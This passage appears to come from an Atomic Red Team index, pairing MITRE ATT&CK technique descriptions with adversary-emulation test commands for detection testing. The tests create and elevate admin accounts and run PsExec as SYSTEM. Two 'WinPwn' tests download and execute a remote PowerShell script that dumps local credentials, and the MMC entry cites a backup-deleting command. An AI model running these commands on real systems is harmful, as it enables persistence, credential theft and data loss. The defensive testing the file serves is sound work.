Concatenation: Trojan Targets Windows Users. Retrieved March 3, 2025.'
url: https://perception-point.io/blog/evasive-concatenated-zip-trojan-targets-windows-users/
- source_name: NTT Security Flagpro new December 2021
description: Hada, H. (2021, December 28). Flagpro The new malware used by
BlackTech. Retrieved March 25, 2022.
url: https://insight-jp.nttsecurity.com/post/102hf3q/flagpro-the-new-malware-used-by-blacktech
- source_name: The Hacker News
description: Ravie Lakshmanan. (2023, April 5). Hackers Using Self-Extracting
Archives Exploit for Stealthy Backdoor Attacks. Retrieved March 3, 2025.
url: https://thehackernews.com/2023/04/hackers-using-self-extracting-archives.html
- source_name: Trustwave Pillowmint June 2020
description: 'Trustwave SpiderLabs. (2020, June 22). Pillowmint: FIN7’s Monkey
Thief . Retrieved July 27, 2020.'
url: https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/pillowmint-fin7s-monkey-thief/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-04-15T19:59:24.125Z'
name: Compression
description: |-
Adversaries may use compression to obfuscate their payloads or files. Compressed file formats such as ZIP, gzip, 7z, and RAR can compress and archive multiple files together to make it easier and faster to transfer files. In addition to compressing files, adversaries may also compress shellcode directly - for example, in order to store it in a Windows Registry key (i.e., [Fileless Storage](https://attack.mitre.org/techniques/T1027/011)).(Citation: Trustwave Pillowmint June 2020)
In order to further evade detection, adversaries may combine multiple ZIP files into one archive. This process of concatenation creates an archive that appears to be a single archive but in fact contains the central directories of the embedded archives. Some ZIP readers, such as 7zip, may not be able to identify concatenated ZIP files and miss the presence of the malicious payload.(Citation: Perception Point)
File archives may be sent as one [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001) through email. Adversaries have sent malicious payloads as archived files to encourage the user to interact with and extract the malicious payload onto their system (i.e., [Malicious File](https://attack.mitre.org/techniques/T1204/002)).(Citation: NTT Security Flagpro new December 2021) However, some file compression tools, such as 7zip, can be used to produce self-extracting archives. Adversaries may send self-extracting archives to hide the functionality of their payload and launch it without requiring multiple actions from the user.(Citation: The Hacker News)
[Compression](https://attack.mitre.org/techniques/T1027/015) may be used in combination with [Encrypted/Encoded File](https://attack.mitre.org/techniques/T1027/013) where compressed files are encrypted and password-protected.
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Fernando Bacchin
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Linux
- Windows
- macOS
x_mitre_version: '1.0'
atomic_tests: []
T1574.004:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--fc742192-19e3-466c-9eb5-964a97b29490
created: '2020-03-16T15:23:30.896Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1574/004
external_id: T1574.004
- source_name: MalwareUnicorn macOS Dylib Injection MachO
description: Amanda Rousseau. (2020, April 4). MacOS Dylib Injection Workshop.
Retrieved March 29, 2021.
url: https://malwareunicorn.org/workshops/macos_dylib_injection.html#5
- source_name: Apple Developer Doco Archive Run-Path
description: Apple Inc.. (2012, July 7). Run-Path Dependent Libraries. Retrieved
March 31, 2021.
url: https://developer.apple.com/library/archive/documentation/DeveloperTools/Conceptual/DynamicLibraries/100-Articles/RunpathDependentLibraries.html
- source_name: Wardle Dylib Hijacking OSX 2015
description: Patrick Wardle. (2015, March 1). Dylib Hijacking on OS X. Retrieved
March 29, 2021.
url: https://www.virusbulletin.com/uploads/pdf/magazine/2015/vb201503-dylib-hijacking.pdf
- source_name: Writing Bad Malware for OSX
description: Patrick Wardle. (2015). Writing Bad @$$ Malware for OS X. Retrieved
July 10, 2017.
url: https://www.blackhat.com/docs/us-15/materials/us-15-Wardle-Writing-Bad-A-Malware-For-OS-X.pdf
- source_name: Wardle Dylib Hijack Vulnerable Apps
description: Patrick Wardle. (2019, July 2). Getting Root with Benign AppStore
Apps. Retrieved March 31, 2021.
url: https://objective-see.com/blog/blog_0x46.html
- source_name: wardle artofmalware volume1
description: 'Patrick Wardle. (2020, August 5). The Art of Mac Malware Volume
0x1: Analysis. Retrieved November 17, 2024.'
url: https://taomm.org/vol1/read.html
- source_name: Github EmpireProject HijackScanner
description: Wardle, P., Ross, C. (2017, September 21). Empire Project Dylib
Hijack Vulnerability Scanner. Retrieved April 1, 2021.
url: https://github.com/EmpireProject/Empire/blob/master/lib/modules/python/situational_awareness/host/osx/HijackScanner.py
- source_name: Github EmpireProject CreateHijacker Dylib
description: Wardle, P., Ross, C. (2018, April 8). EmpireProject Create Dylib
Hijacker. Retrieved April 1, 2021.
url: https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/python/persistence/osx/CreateHijacker.py
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:39.243Z'
name: Dylib Hijacking
description: |-
Adversaries may execute their own payloads by placing a malicious dynamic library (dylib) with an expected name in a path a victim application searches at runtime. The dynamic loader will try to find the dylibs based on the sequential order of the search paths. Paths to dylibs may be prefixed with @rpath, which allows developers to use relative paths to specify an array of search paths used at runtime based on the location of the executable. Additionally, if weak linking is used, such as the LC_LOAD_WEAK_DYLIB function, an application will still execute even if an expected dylib is not present. Weak linking enables developers to run an application on multiple macOS versions as new APIs are added.
Adversaries may gain execution by inserting malicious dylibs with the name of the missing dylib in the identified path.(Citation: Wardle Dylib Hijack Vulnerable Apps)(Citation: Wardle Dylib Hijacking OSX 2015)(Citation: Github EmpireProject HijackScanner)(Citation: Github EmpireProject CreateHijacker Dylib) Dylibs are loaded into an application's address space allowing the malicious dylib to inherit the application's privilege level and resources. Based on the application, this could result in privilege escalation and uninhibited network access. This method may also evade detection from security products since the execution is masked under a legitimate process.(Citation: Writing Bad Malware for OSX)(Citation: wardle artofmalware volume1)(Citation: MalwareUnicorn macOS Dylib Injection MachO)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: defense-evasion
x_mitre_attack_spec_version: 3.2.0
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- macOS
x_mitre_version: '2.1'
atomic_tests: []
T1601.002:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--fc74ba38-dc98-461f-8611-b3dbf9978e3d
created: '2020-10-19T19:53:10.576Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1601/002
external_id: T1601.002
- source_name: Cisco Synful Knock Evolution
description: Graham Holmes. (2015, October 8). Evolution of attacks on Cisco
IOS devices. Retrieved October 19, 2020.
url: https://blogs.cisco.com/security/evolution-of-attacks-on-cisco-ios-devices
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:39.331Z'
name: Downgrade System Image
description: "Adversaries may install an older version of the operating system
of a network device to weaken security. Older operating system versions on
network devices often have weaker encryption ciphers and, in general, fewer/less
updated defensive features. (Citation: Cisco Synful Knock Evolution)\n\nOn
embedded devices, downgrading the version typically only requires replacing
the operating system file in storage. With most embedded devices, this can
be achieved by downloading a copy of the desired version of the operating
system file and reconfiguring the device to boot from that file on next system
restart. The adversary could then restart the device to implement the change
immediately or they could wait until the next time the system restarts.\n\nDowngrading
the system image to an older versions may allow an adversary to evade defenses
by enabling behaviors such as [Weaken Encryption](https://attack.mitre.org/techniques/T1600).
\ Downgrading of a system image can be done on its own, or it can be used
in conjunction with [Patch System Image](https://attack.mitre.org/techniques/T1601/001).
\ "
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
x_mitre_attack_spec_version: 3.2.0
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Network Devices
x_mitre_version: '1.1'
atomic_tests: []
T1078.003:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--fdc47f44-dd32-4b99-af5f-209f556f63c2
created: '2020-03-13T20:26:46.695Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1078/003
external_id: T1078.003
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:39.874Z'
name: 'Valid Accounts: Local Accounts'
description: "Adversaries may obtain and abuse credentials of a local account
as a means of gaining Initial Access, Persistence, Privilege Escalation, or
Defense Evasion. Local accounts are those configured by an organization for
use by users, remote support, services, or for administration on a single
system or service.\n\nLocal Accounts may also be abused to elevate privileges
and harvest credentials through [OS Credential Dumping](https://attack.mitre.org/techniques/T1003).
Password reuse may allow the abuse of local accounts across a set of machines
on a network for the purposes of Privilege Escalation and Lateral Movement. "
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: initial-access
x_mitre_attack_spec_version: 3.2.0
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Linux
- macOS
- Windows
- Containers
- Network Devices
- ESXi
x_mitre_version: '1.5'
identifier: T1078.003
atomic_tests:
- name: Create local account with admin privileges
auto_generated_guid: a524ce99-86de-4db6-b4f9-e08f35a47a15
description: After execution the new account will be active and added to the
Administrators group
supported_platforms:
- windows
input_arguments:
password:
description: Password for art-test user
type: string
default: "-4RTisCool!-321"
executor:
command: |-
net user art-test /add
net user art-test #{password}
net localgroup administrators art-test /add
cleanup_command: |-
net localgroup administrators art-test /delete >nul 2>&1
net user art-test /delete >nul 2>&1
name: command_prompt
elevation_required: true
- name: Create local account with admin privileges - MacOS
auto_generated_guid: f1275566-1c26-4b66-83e3-7f9f7f964daa
description: After execution the new account will be active and added to the
Administrators group
supported_platforms:
- macos
executor:
command: |-
dscl . -create /Users/AtomicUser
dscl . -create /Users/AtomicUser UserShell /bin/bash
dscl . -create /Users/AtomicUser RealName "Atomic User"
dscl . -create /Users/AtomicUser UniqueID 503
dscl . -create /Users/AtomicUser PrimaryGroupID 503
dscl . -create /Users/AtomicUser NFSHomeDirectory /Local/Users/AtomicUser
dscl . -passwd /Users/AtomicUser mySecretPassword
dscl . -append /Groups/admin GroupMembership AtomicUser
cleanup_command: sudo dscl . -delete /Users/AtomicUser
name: bash
elevation_required: true
- name: Create local account with admin privileges using sysadminctl utility -
MacOS
auto_generated_guid: 191db57d-091a-47d5-99f3-97fde53de505
description: After execution the new account will be active and added to the
Administrators group
supported_platforms:
- macos
executor:
command: sysadminctl interactive -addUser art-tester -fullName ARTUser -password
!pass123! -admin
cleanup_command: sysadminctl interactive -deleteUser art-tester
name: bash
elevation_required: true
- name: Enable root account using dsenableroot utility - MacOS
auto_generated_guid: 20b40ea9-0e17-4155-b8e6-244911a678ac
description: After execution the current/new user will have root access
supported_platforms:
- macos
executor:
command: |-
dsenableroot #current user
dsenableroot -u art-tester -p art-tester -r art-root #new user
cleanup_command: |-
dsenableroot -d #current user
dsenableroot -d -u art-tester -p art-tester #new user
name: bash
elevation_required: true
- name: Add a new/existing user to the admin group using dseditgroup utility -
macOS
auto_generated_guid: 433842ba-e796-4fd5-a14f-95d3a1970875
description: After execution the current/new user will be added to the Admin
group
supported_platforms:
- macos
executor:
command: dseditgroup -o edit -a art-user -t user admin
cleanup_command: dseditgroup -o edit -d art-user -t user admin
name: bash
elevation_required: true
- name: WinPwn - Loot local Credentials - powerhell kittie
auto_generated_guid: 9e9fd066-453d-442f-88c1-ad7911d32912
description: Loot local Credentials - powerhell kittie technique via function
of WinPwn
supported_platforms:
- windows
executor:
command: |-
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
obfuskittiedump -consoleoutput -noninteractive
name: powershell
elevation_required: true
- name: WinPwn - Loot local Credentials - Safetykatz
auto_generated_guid: e9fdb899-a980-4ba4-934b-486ad22e22f4
description: Loot local Credentials - Safetykatz technique via function of WinPwn
supported_platforms:
- windows
executor:
command: |-
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
safedump -consoleoutput -noninteractive
name: powershell
elevation_required: true
- name: Create local account (Linux)
auto_generated_guid: 02a91c34-8a5b-4bed-87af-501103eb5357
description: 'An adversary may wish to create an account with admin privileges
to work with. In this test we create a "art" user with the password art, switch
to art, execute whoami, exit and delete the art user.
'
supported_platforms:
- linux
executor:
name: bash
elevation_required: true
command: |
password=$(openssl passwd -1 art)
([ "$(uname)" = 'Linux' ] && useradd --shell /bin/bash --create-home --password $password art) || (pw useradd art -g wheel -s /bin/sh && (echo $password | pw mod user testuser1 -h 0))
su art -c "whoami; exit"
cleanup_command: '[ "$(uname)" = ''Linux'' ] && userdel art -rf || rmuser
-y art
'
- name: Reactivate a locked/expired account (Linux)
auto_generated_guid: d2b95631-62d7-45a3-aaef-0972cea97931
description: "A system administrator may have locked and expired a user account
rather than deleting it. \"the user is coming back, at some stage\" An adversary
may reactivate a inactive account in an attempt to appear legitimate. \n\nIn
this test we create a \"art\" user with the password art, lock and expire
the account, try to su to art and fail, unlock and renew the account, su successfully,
then delete the account.\n"
supported_platforms:
- linux
executor:
name: bash
elevation_required: true
command: |
useradd --shell /bin/bash --create-home --password $(openssl passwd -1 art) art
usermod --lock art
usermod --expiredate "1" art
usermod --unlock art
usermod --expiredate "99999" art
su -c whoami art
cleanup_command: "userdel -r art \n"
- name: Reactivate a locked/expired account (FreeBSD)
auto_generated_guid: '09e3380a-fae5-4255-8b19-9950be0252cf'
description: "A system administrator may have locked and expired a user account
rather than deleting it. \"the user is coming back, at some stage\" An adversary
may reactivate a inactive account in an attempt to appear legitimate. \n\nIn
this test we create a \"art\" user with the password art, lock and expire
the account, try to su to art and fail, unlock and renew the account, su successfully,
then delete the account.\n"
supported_platforms:
- linux
executor:
name: sh
elevation_required: true
command: |
pw useradd art -g wheel -s /bin/sh
echo $(openssl passwd -1 art) | pw mod user testuser1 -h 0
pw lock art
pw usermod art -e +1d
pw unlock art
pw user mod art -e +99d
su art
whoami
exit
cleanup_command: "rmuser -y art \n"
- name: Login as nobody (Linux)
auto_generated_guid: 3d2cd093-ee05-41bd-a802-59ee5c301b85
description: 'An adversary may try to re-purpose a system account to appear
legitimate. In this test change the login shell of the nobody account, change
its password to nobody, su to nobody, exit, then reset nobody''s shell to
/usr/sbin/nologin. Here is how the nobody entry should look like in `/etc/passwd`
before the test is executed and right after the cleanup: `# -> nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin`
'
supported_platforms:
- linux
executor:
name: bash
elevation_required: true
command: |
cat /etc/passwd |grep nobody
chsh --shell /bin/bash nobody
usermod --password $(openssl passwd -1 nobody) nobody
su -c "whoami" nobody
cleanup_command: |
chsh --shell /usr/sbin/nologin nobody
cat /etc/passwd |grep nobody
# -> nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
- name: Login as nobody (freebsd)
auto_generated_guid: 16f6374f-7600-459a-9b16-6a88fd96d310
description: 'An adversary may try to re-purpose a system account to appear
legitimate. In this test change the login shell of the nobody account, change
its password to nobody, su to nobody, exit, then reset nobody''s shell to
/usr/sbin/nologin. Here is how the nobody entry should look like in `/etc/passwd`
before the test is executed and right after the cleanup: `# -> nobody:x:65534:65534:Unprivileged
user:/nonexistent:/usr/sbin/nologin`
'
supported_platforms:
- linux
executor:
name: sh
elevation_required: true
command: |
cat /etc/passwd |grep nobody
pw usermod nobody -s /bin/sh
echo $(openssl passwd -1 art) | pw mod user nobody -h 0
su nobody
whoami
exit
cleanup_command: |
pw usermod nobody -s /usr/sbin/nologin
cat /etc/passwd |grep nobody
# -> nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin
- name: Use PsExec to elevate to NT Authority\SYSTEM account
auto_generated_guid: 6904235f-0f55-4039-8aed-41c300ff7733
description: "PsExec is a powerful tool most known for its remote management
capability. However, it can also be used to run processes as the local system
account.\n\nThe local system account is a default windows account which has
unrestricted access to all system resources.\n\nUpon successful execution,
PsExec.exe will spawn a command prompt which will run 'whoami' as the local
system account and then exit. \n"
supported_platforms:
- windows
dependency_executor_name: powershell
dependencies:
- description: 'PsExec tool from Sysinternals must exist in the ExternalPayloads
directory
'
prereq_command: 'if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\PsExec.exe")
{ exit 0 } else { exit 1 }
'
get_prereq_command: |
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\PsTools.zip"
Expand-Archive "PathToAtomicsFolder\..\ExternalPayloads\PsTools.zip" "PathToAtomicsFolder\..\ExternalPayloads\PsTools" -Force
Copy-Item "PathToAtomicsFolder\..\ExternalPayloads\PsTools\PsExec.exe" "PathToAtomicsFolder\..\ExternalPayloads\PsExec.exe" -Force
executor:
name: command_prompt
elevation_required: true
command: '"PathToAtomicsFolder\..\ExternalPayloads\PsExec.exe" -accepteula
-s %COMSPEC% /c whoami
'
T1211:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--fe926152-f431-4baf-956c-4ad3cb0bf23b
created: '2018-04-18T17:59:24.739Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1211
external_id: T1211
- source_name: Salesforce zero-day in facebook phishing attack
description: Bill Toulas. (2023, August 2). Hackers exploited Salesforce zero-day
in Facebook phishing attack. Retrieved September 18, 2023.
url: https://www.bleepingcomputer.com/news/security/hackers-exploited-salesforce-zero-day-in-facebook-phishing-attack/
- source_name: Bypassing CloudTrail in AWS Service Catalog
description: Nick Frichette. (2023, March 20). Bypassing CloudTrail in AWS
Service Catalog, and Other Logging Research. Retrieved September 18, 2023.
url: https://securitylabs.datadoghq.com/articles/bypass-cloudtrail-aws-service-catalog-and-other/
- source_name: GhostToken GCP flaw
description: Sergiu Gatlan. (2023, April 21). GhostToken GCP flaw let attackers
backdoor Google accounts. Retrieved September 18, 2023.
url: https://www.bleepingcomputer.com/news/security/ghosttoken-gcp-flaw-let-attackers-backdoor-google-accounts/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:39.960Z'
name: Exploitation for Defense Evasion
description: |-
Adversaries may exploit a system or application vulnerability to bypass security features. Exploitation of a vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Vulnerabilities may exist in defensive security software that can be used to disable or circumvent them.
Adversaries may have prior knowledge through reconnaissance that security software exists within an environment or they may perform checks during or shortly after the system is compromised for [Security Software Discovery](https://attack.mitre.org/techniques/T1518/001). The security software will likely be targeted directly for exploitation. There are examples of antivirus software being targeted by persistent threat groups to avoid detection.
There have also been examples of vulnerabilities in public cloud infrastructure of SaaS applications that may bypass defense boundaries (Citation: Salesforce zero-day in facebook phishing attack), evade security logs (Citation: Bypassing CloudTrail in AWS Service Catalog), or deploy hidden infrastructure.(Citation: GhostToken GCP flaw)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- John Lambert, Microsoft Threat Intelligence Center
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Linux
- Windows
- macOS
- SaaS
- IaaS
x_mitre_version: '1.5'
atomic_tests: []
T1127:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--ff25900d-76d5-449b-a351-8824e62fc81b
created: '2017-05-31T21:31:39.262Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1127
external_id: T1127
- source_name: Exploit Monday WinDbg
description: Graeber, M. (2016, August 15). Bypassing Application Whitelisting
by using WinDbg/CDB as a Shellcode Runner. Retrieved November 17, 2024.
url: https://web.archive.org/web/20160816135945/http://www.exploit-monday.com/2016/08/windbg-cdb-shellcode-runner.html
- source_name: Elastic Security Labs
description: Joe Desimone. (2024, August 5). Dismantling Smart App Control.
Retrieved March 21, 2025.
url: https://www.elastic.co/security-labs/dismantling-smart-app-control
- source_name: LOLBAS Tracker
description: LOLBAS. (n.d.). Tracker.exe. Retrieved July 31, 2019.
url: https://lolbas-project.github.io/lolbas/OtherMSBinaries/Tracker/
- source_name: Microsoft Smart App Control
description: Microsoft. (n.d.). Smart App Control Frequently Asked Questions.
Retrieved April 4, 2025.
url: https://support.microsoft.com/en-us/windows/smart-app-control-frequently-asked-questions-285ea03d-fa88-4d56-882e-6698afdb7003
- source_name: engima0x3 RCSI Bypass
description: Nelson, M. (2016, November 21). Bypassing Application Whitelisting
By Using rcsi.exe. Retrieved May 26, 2017.
url: https://enigma0x3.net/2016/11/21/bypassing-application-whitelisting-by-using-rcsi-exe/
- source_name: engima0x3 DNX Bypass
description: Nelson, M. (2017, November 17). Bypassing Application Whitelisting
By Using dnx.exe. Retrieved May 25, 2017.
url: https://enigma0x3.net/2016/11/17/bypassing-application-whitelisting-by-using-dnx-exe/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:40.055Z'
name: Trusted Developer Utilities Proxy Execution
description: |-
Adversaries may take advantage of trusted developer utilities to proxy execution of malicious payloads. There are many utilities used for software development related tasks that can be used to execute code in various forms to assist in development, debugging, and reverse engineering.(Citation: engima0x3 DNX Bypass)(Citation: engima0x3 RCSI Bypass)(Citation: Exploit Monday WinDbg)(Citation: LOLBAS Tracker) These utilities may often be signed with legitimate certificates that allow them to execute on a system and proxy execution of malicious code through a trusted process that effectively bypasses application control solutions.
Smart App Control is a feature of Windows that blocks applications it considers potentially malicious from running by verifying unsigned applications against a known safe list from a Microsoft cloud service before executing them.(Citation: Microsoft Smart App Control) However, adversaries may leverage "reputation hijacking" to abuse an operating system’s trust of safe, signed applications that support the execution of arbitrary code. By leveraging [Trusted Developer Utilities Proxy Execution](https://attack.mitre.org/techniques/T1127) to run their malicious code, adversaries may bypass Smart App Control protections.(Citation: Elastic Security Labs)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Casey Smith
- Matthew Demaske, Adaptforward
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.3'
identifier: T1127
atomic_tests:
- name: Lolbin Jsc.exe compile javascript to exe
auto_generated_guid: 1ec1c269-d6bd-49e7-b71b-a461f7fa7bc8
description: |
Use jsc.exe to compile javascript code stored in scriptfile.js and output scriptfile.exe.
https://lolbas-project.github.io/lolbas/Binaries/Jsc/
https://www.phpied.com/make-your-javascript-a-windows-exe/
supported_platforms:
- windows
input_arguments:
filename:
description: Location of the project file
type: path
default: PathToAtomicsFolder\T1127\src\hello.js
jscpath:
description: Default location of jsc.exe
type: path
default: C:\Windows\Microsoft.NET\Framework\v4.0.30319
jscname:
description: Default name of jsc
type: path
default: jsc.exe
dependency_executor_name: powershell
dependencies:
- description: 'JavaScript code file must exist on disk at specified location
(#{filename})
'
prereq_command: 'if (Test-Path "#{filename}") {exit 0} else {exit 1}
'
get_prereq_command: |
New-Item -Type Directory (split-path "#{filename}") -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1127/src/hello.js" -OutFile "#{filename}"
executor:
command: |
copy "#{filename}" %TEMP%\hello.js
#{jscpath}\#{jscname} %TEMP%\hello.js
cleanup_command: |
del %TEMP%\hello.js
del %TEMP%\hello.exe
name: command_prompt
- name: Lolbin Jsc.exe compile javascript to dll
auto_generated_guid: 3fc9fea2-871d-414d-8ef6-02e85e322b80
description: |
Use jsc.exe to compile javascript code stored in Library.js and output Library.dll.
https://lolbas-project.github.io/lolbas/Binaries/Jsc/
https://www.phpied.com/make-your-javascript-a-windows-exe/
supported_platforms:
- windows
input_arguments:
filename:
description: Location of the project file
type: path
default: PathToAtomicsFolder\T1127\src\LibHello.js
jscpath:
description: Default location of jsc.exe
type: path
default: C:\Windows\Microsoft.NET\Framework\v4.0.30319
jscname:
description: Default name of jsc
type: path
default: jsc.exe
dependency_executor_name: powershell
dependencies:
- description: 'JavaScript code file must exist on disk at specified location
(#{filename})
'
prereq_command: 'if (Test-Path "#{filename}") {exit 0} else {exit 1}
'
get_prereq_command: |
New-Item -Type Directory (split-path "#{filename}") -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1127/src/LibHello.js" -OutFile "#{filename}"
executor:
command: |
copy "#{filename}" %TEMP%\LibHello.js
#{jscpath}\#{jscname} /t:library %TEMP%\LibHello.js
cleanup_command: |
del %TEMP%\LibHello.js
del %TEMP%\LibHello.dll
name: command_prompt
T1218.014:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--ffbcfdb0-de22-4106-9ed3-fc23c8a01407
created: '2021-09-28T01:36:41.638Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1218/014
external_id: T1218.014
- source_name: abusing_com_reg
description: 'bohops. (2018, August 18). ABUSING THE COM REGISTRY STRUCTURE
(PART 2): HIJACKING & LOADING TECHNIQUES. Retrieved September 20, 2021.'
url: https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/
- source_name: mmc_vulns
description: Boxiner, A., Vaknin, E. (2019, June 11). Microsoft Management
Console (MMC) Vulnerabilities. Retrieved September 24, 2021.
url: https://research.checkpoint.com/2019/microsoft-management-console-mmc-vulnerabilities/
- source_name: win_msc_files_overview
description: Brinkmann, M.. (2017, June 10). Windows .msc files overview.
Retrieved September 20, 2021.
url: https://www.ghacks.net/2017/06/10/windows-msc-files-overview/
- source_name: win_mmc
description: Microsoft. (2017, October 16). mmc. Retrieved September 20, 2021.
url: https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/mmc
- source_name: win_wbadmin_delete_catalog
description: Microsoft. (2017, October 16). wbadmin delete catalog. Retrieved
September 20, 2021.
url: https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/wbadmin-delete-catalog
- source_name: win_clsid_key
description: Microsoft. (2018, May 31). CLSID Key. Retrieved September 24,
2021.
url: https://docs.microsoft.com/en-us/windows/win32/com/clsid-key-hklm
- source_name: what_is_mmc
description: Microsoft. (2020, September 27). What is Microsoft Management
Console?. Retrieved October 5, 2021.
url: https://docs.microsoft.com/en-us/troubleshoot/windows-server/system-management-components/what-is-microsoft-management-console
- source_name: phobos_virustotal
description: Phobos Ransomware. (2020, December 30). Phobos Ransomware, Fast.exe.
Retrieved September 20, 2021.
url: https://www.virustotal.com/gui/file/0b4c743246478a6a8c9fa3ff8e04f297507c2f0ea5d61a1284fe65387d172f81/detection
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:40.236Z'
name: MMC
description: "Adversaries may abuse mmc.exe to proxy execution of malicious
.msc files. Microsoft Management Console (MMC) is a binary that may be signed
by Microsoft and is used in several ways in either its GUI or in a command
prompt.(Citation: win_mmc)(Citation: what_is_mmc) MMC can be used to create,
open, and save custom consoles that contain administrative tools created by
Microsoft, called snap-ins. These snap-ins may be used to manage Windows systems
locally or remotely. MMC can also be used to open Microsoft created .msc files
to manage system configuration.(Citation: win_msc_files_overview)\n\nFor example,
mmc C:\\Users\\foo\\admintools.msc /a will open a custom, saved
console msc file in author mode.(Citation: win_mmc) Another common example
is mmc gpedit.msc, which will open the Group Policy Editor application
window. \n\nAdversaries may use MMC commands to perform malicious tasks. For
example, mmc wbadmin.msc delete catalog -quiet deletes the backup
catalog on the system (i.e. [Inhibit System Recovery](https://attack.mitre.org/techniques/T1490))
without prompts to the user (Note: wbadmin.msc may only be present
by default on Windows Server operating systems).(Citation: win_wbadmin_delete_catalog)(Citation:
phobos_virustotal)\n\nAdversaries may also abuse MMC to execute malicious
.msc files. For example, adversaries may first create a malicious registry
